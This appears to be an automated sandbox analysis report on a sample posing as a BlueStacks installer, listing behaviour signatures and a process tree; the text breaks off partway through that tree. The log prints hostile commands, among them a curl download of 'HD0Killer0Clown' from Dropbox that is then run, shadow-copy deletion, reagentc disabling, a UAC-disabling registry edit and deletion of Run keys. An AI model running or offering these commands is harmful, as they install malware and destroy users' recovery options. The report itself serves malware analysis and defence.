Analysis
-
max time kernel
1800s -
max time network
1794s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
24-05-2024 12:23
General
-
Target
BlueStacksMicroInstaller_4.190.0.5002_native (1).exe
-
Size
974KB
-
MD5
7285cfb7e37fbc9d90ac5d9947abea30
-
SHA1
8529ac4b2cde18079dbc058a0627e13d1fc0e7e1
-
SHA256
3e55b6d393911bef47c310f713334e7a39e9ff1fdec502131ec419bc3eba3118
-
SHA512
5af175a6d068f1f48302dd7dacc5e910dccf1af2dda57cae1174b7a51812f6afe11b99c9be951df6f3777b04281e480a4050b727265d8b4701b551104f63f700
-
SSDEEP
24576:wcVkKS/WtWrnngnnnKnanxNp5t2G1ZfrTdIlolt7+TZv8:wcB6WErnngnnnKnanz3AAZfrTWlItKl8
Score
10/10
Malware Config
Signatures
-
UAC bypass 3 TTPs 2 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Drivers directory 2 IoCs
-
Drops startup file 4 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Downloads MZ/PE file
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Modifies Installed Components in the registry 2 TTPs 20 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in System32 directory 2 IoCs
-
Modifies WinLogon for persistence 2 TTPs 4 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 16 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 54 IoCs
-
Modifies system executable filetype association 2 TTPs 8 IoCs
-
Registers COM server for autorun 1 TTPs 4 IoCs
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 14 IoCs
-
Kills process with taskkill 30 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies File Icons 64 IoCs
-
Modifies Internet Explorer settings 1 TTPs 21 IoCs
-
Modifies Shortcut Icons 2 IoCs
Modifies/removes arrow indicator from shortcut icons.
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BlueStacksMicroInstaller_4.190.0.5002_native (1).exe"C:\Users\Admin\AppData\Local\Temp\BlueStacksMicroInstaller_4.190.0.5002_native (1).exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS835B4557\BlueStacksInstaller.exe"C:\Users\Admin\AppData\Local\Temp\7zS835B4557\BlueStacksInstaller.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS835B4557\BlueStacksInstaller.exe"C:\Users\Admin\AppData\Local\Temp\7zS835B4557\BlueStacksInstaller.exe" "install" "BlueStacksMicroInstaller_4.190.0.5002_native (1).exe" "null" "admin" "4af341f7-bd05-4ae4-8e38-d581dcc8714d" "d028feb9-ea66-4c87-b727-45ff2bc55b1b"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.0.1256722422\1545279974" -parentBuildID 20230214051806 -prefsHandle 1792 -prefMapHandle 1784 -prefsLen 22244 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d512899-b1bf-4e43-a6ce-6a87c721d403} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 1884 155916f5b58 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.1.171434503\795156411" -parentBuildID 20230214051806 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 22280 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ce7d69a-005e-48c9-a836-61160315ad3c} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 2452 15592b6b058 socket3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.2.500092300\1840520140" -childID 1 -isForBrowser -prefsHandle 2908 -prefMapHandle 2940 -prefsLen 22318 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d08ee22-e599-4a34-92c5-9a5c8873a6bc} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 3060 15594ff8858 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.3.2135172421\1493259115" -childID 2 -isForBrowser -prefsHandle 3724 -prefMapHandle 3720 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05fd5407-2905-4800-bf44-baeb88e62410} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 3736 15597738558 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.4.1239632468\1331541662" -childID 3 -isForBrowser -prefsHandle 5004 -prefMapHandle 5000 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1f249f1-4dde-42c0-8ded-81e6b3a09de8} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 4996 155992c5758 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.5.532392946\487792576" -childID 4 -isForBrowser -prefsHandle 5244 -prefMapHandle 5240 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1fb034c-be71-4f89-8d0a-f81186714f12} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 5160 155992c6658 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.6.1036738927\1589288879" -childID 5 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0403be9-9ed6-49c6-8ab5-076b55cd1e8d} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 5340 155992c6c58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.7.214028106\2042004722" -childID 6 -isForBrowser -prefsHandle 6028 -prefMapHandle 6024 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c20a74e-b90c-4600-a9b5-3748504dc846} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 6044 1559a939758 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.8.963647238\754164296" -childID 7 -isForBrowser -prefsHandle 6380 -prefMapHandle 6376 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eda2e4b2-dec0-4eb1-846d-1d5d35c14255} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 6392 1559b316858 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.9.933506894\1102765721" -childID 8 -isForBrowser -prefsHandle 10516 -prefMapHandle 10508 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60ee006e-2e82-46ad-b643-2041f3b1ce49} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 10416 1559b614958 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3284.10.1044152857\1861919088" -childID 9 -isForBrowser -prefsHandle 10220 -prefMapHandle 10216 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97f9a6d6-f4b1-463c-9fea-ebdc1619d097} 3284 "\\.\pipe\gecko-crash-server-pipe.3284" 10228 1559c411c58 tab3⤵
-
C:\Users\Admin\Downloads\3MB Online Install.exe"C:\Users\Admin\Downloads\3MB Online Install.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Drivers\Start.exe"C:\ProgramData\Drivers\Start.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FE9A.tmp\FE9B.tmp\FE9C.bat C:\ProgramData\Drivers\Start.exe"3⤵
-
C:\ProgramData\Drivers\curl.exeC:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Drivers\Driver.exe"C:\ProgramData\Drivers\Driver.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\clown.exe"C:\java\protection\clown.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E52.tmp\3E53.tmp\3E54.bat C:\java\protection\clown.exe"6⤵
-
C:\java\protection\start\startban.exeC:\java\protection\start\startban.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F6C.tmp\3F6D.tmp\3F6E.bat C:\java\protection\start\startban.exe"8⤵
-
C:\java\ban\ban.exeC:\java\ban\ban.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\ban\ban.exeC:\java\ban\ban.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\def.exeC:\java\protection\def.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F6D.tmp\3F6D.tmp\3F6E.bat C:\java\protection\def.exe"8⤵
-
C:\java\protection\DisDef.exeC:\java\protection\DisDef.exe /D9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\start\startcur.exeC:\java\protection\start\startcur.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F7B.tmp\3F7C.tmp\3F7D.bat C:\java\protection\start\startcur.exe"8⤵
-
C:\java\ban\cur.exeC:\java\ban\cur.exe9⤵
- Executes dropped EXE
-
C:\java\protection\start\startkey.exeC:\java\protection\start\startkey.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FAA.tmp\3FBB.tmp\3FBC.bat C:\java\protection\start\startkey.exe"8⤵
-
C:\java\ban\key.exeC:\java\ban\key.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\41FC.tmp\41FD.tmp\41FE.bat C:\java\ban\key.exe"10⤵
-
C:\Windows\system32\reg.exereg import C:\java\ban\key.reg11⤵
-
C:\Windows\system32\ReAgentc.exereagentc /disable7⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\java\zip\7z.exeC:\java\zip\7z.exe a -tzip -mx1 -r0 C:\ProgramData\WindowsVersion\archive.zip C:\java7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\java\protection\start\startdelstartup.exeC:\java\protection\start\startdelstartup.exe7⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AA2.tmp\6AA3.tmp\6AA4.bat C:\java\protection\start\startdelstartup.exe"8⤵
-
C:\java\protection\delstartup.exeC:\java\protection\delstartup.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D43.tmp\6D43.tmp\6D44.bat C:\java\protection\delstartup.exe"10⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f11⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /va /f11⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /va /f11⤵
-
C:\java\protection\start\startuac.exeC:\java\protection\start\startuac.exe7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AA3.tmp\6AA3.tmp\6AA4.bat C:\java\protection\start\startuac.exe"8⤵
-
C:\java\protection\uac.exeC:\java\protection\uac.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C86.tmp\6C87.tmp\6C98.bat C:\java\protection\uac.exe"10⤵
-
C:\Windows\system32\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f11⤵
- UAC bypass
- Modifies registry key
-
C:\java\protection\start\startauto.exeC:\java\protection\start\startauto.exe7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AA4.tmp\6AA3.tmp\6AA4.bat C:\java\protection\start\startauto.exe"8⤵
-
C:\java\protection\auto.exeC:\java\protection\auto.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D42.tmp\6D43.tmp\6D44.bat C:\java\protection\auto.exe"10⤵
- Drops startup file
-
C:\java\protection\start\startWinlog.exeC:\java\protection\start\startWinlog.exe7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AD2.tmp\6AD2.tmp\6AD3.bat C:\java\protection\start\startWinlog.exe"8⤵
-
C:\java\protection\Winlog.exeC:\java\protection\Winlog.exe9⤵
- Modifies WinLogon for persistence
-
C:\java\protection\start\startExplorerIcons.exeC:\java\protection\start\startExplorerIcons.exe7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AD1.tmp\6AD2.tmp\6AD3.bat C:\java\protection\start\startExplorerIcons.exe"8⤵
-
C:\java\protection\ExplorerIcons.exeC:\java\protection\ExplorerIcons.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CC5.tmp\6CC6.tmp\6CC7.bat C:\java\protection\ExplorerIcons.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 1 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 2 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 4 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 5 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 6 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 7 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 8 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 9 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 10 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 11 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 12 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 13 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 14 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 15 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 16 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 17 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 18 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 19 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 20 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 21 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 22 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 23 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 24 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 25 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 26 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 27 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 28 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies Shortcut Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 30 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 31 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 32 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 33 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 34 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 35 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 36 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 37 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 38 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 39 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 40 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 41 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 42 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 43 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 44 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 45 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 46 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
